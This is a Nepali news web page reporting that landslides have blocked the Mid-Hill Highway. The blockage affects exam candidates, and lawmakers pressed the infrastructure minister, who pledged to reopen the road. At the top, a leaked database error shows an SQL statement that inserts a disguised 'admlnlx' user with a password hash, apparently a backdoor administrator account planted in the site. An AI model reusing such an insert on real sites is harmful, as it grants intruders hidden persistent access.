WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B35ydI7ljsBV0BLBzncFpu3ZjIA/8d0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:53:53', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, १ साउन, काठमाडौं । अविरल वर्षा पछी गएको बढी र पैरोले मध्यपहाडी राजमार्ग शुक्रबारदेखि अवरुद्ध भएको छ ।
खुर्कोटदेखि ओखलढुंगा हुँदै सोलुखुम्बु र खोटाङ जोड्ने सडक अवरुद्ध हुँदा लोकसवा आयोगका परीक्षार्थी पनि प्रभावित भएका छन् ।
लोकसेवा आयोगले स्थानीय तहमा कर्मचारी भर्नाका लागि खोलेको विज्ञापनको परीक्षा साउन ४ गतेलाई तोकिएको छ । परीक्षा केन्द्र प्रदेश १ को खोटाङमा पनि छ । सडक सञ्चालन नहुँदा लोकसेवाको जाँच दिने विद्यार्थी परीक्षाबाट बञ्चित हुने देखिएको छ ।
सोलुखुम्बु, ओखलढुंगा र खोटाङका सांसदहरुले भौतिक पूर्वाधारमन्त्री रघुवीर महासेठलाई भेटेर सडक तत्काल सञ्चालन गर्न माग गरेका छन् ।
मन्त्रीलाई दबाव दिन सोलुखुम्बुका हेमकुमार राई ‘सुरबिर’, ओखलढुंगाका सांसद यज्ञराज सुनुवार, खोटाङका विशाल भट्टराई मन्त्रालय पुगेका थिए । आफैं तीन दिन पहिरोमा थुनिएर कष्टकर ढंगले काठमाडौं आएको भन्दै ओखलढुंगाका सांसद यज्ञराज सुनुवारले पहिरोमा परेका बेला खिचेको भिडियोसमेत मोबाइलबाट देखाएका थिए ।
सडकको अवस्था देखाउँदै परीक्षा सार्न आग्रह गर्दा लोकसेवालाई नमानेको सांसद विशाल भट्टराईले बताए ।
जवाफमा मन्त्री महासेठले तीन दिनभित्रमा तीनै जिल्लामा सडक यातायात सञ्चालन गर्ने प्रतिबद्धता जनाएका छन् । मन्त्रालयका सचिव र सडक आयोजना प्रमुख समेतलाई राखेर महासेठले भएभरको शक्ति लगाएर भए पनि मध्यपहाडी राजमार्गको खुर्कोट पूर्वको भाग तीन दिनभित्र खोलिने बताए ।
बाढी र पहिरोले गर्दा मध्यपहाडी राजमार्गको खुर्कोट घुर्मी–ओखलढुंगा–सल्लेरी र खोटाङ खण्डका ठाउँ ठाउँमा सडक भत्किएको छ । अक्कड भीर, नवलपुर, खाङसाङ, नागथान, भँडारे, घुर्मी गैरा, सोकु लगायतका ठाउँमा पहिरोले सडक अवरुद्ध भएको सांसद हेम कुमार राई ‘सुरबिर’ले बताए ।
अहिले सडक सफा गर्न ९ वटा एक्साभेटर सञ्चालनमा रहेको र तीन दिनभित्र सडक सुचारु गर्नका लागि आवश्यक सबै शक्ति परिचालन गरिने मन्त्री महासेठले बताए ।
सांसदहरुले सोखु खोला, बादुरा खोला र खाङसाङमा पुल निर्माण गर्ने ठेक्का पाएको पप्पु कन्सट्रक्सन र सगरमाथा जेभीमाथि कारवाहीको माग समेत गरे । जवाफमा मन्त्रीले पप्पु लगायतका कम्पनीलाई कालोसूचीमा राखिएको र अरुमाथि पनि कारबाही हुने बताए ।
https://gaulenews.com/?p=47180
https://gaulenews.com/?p=47160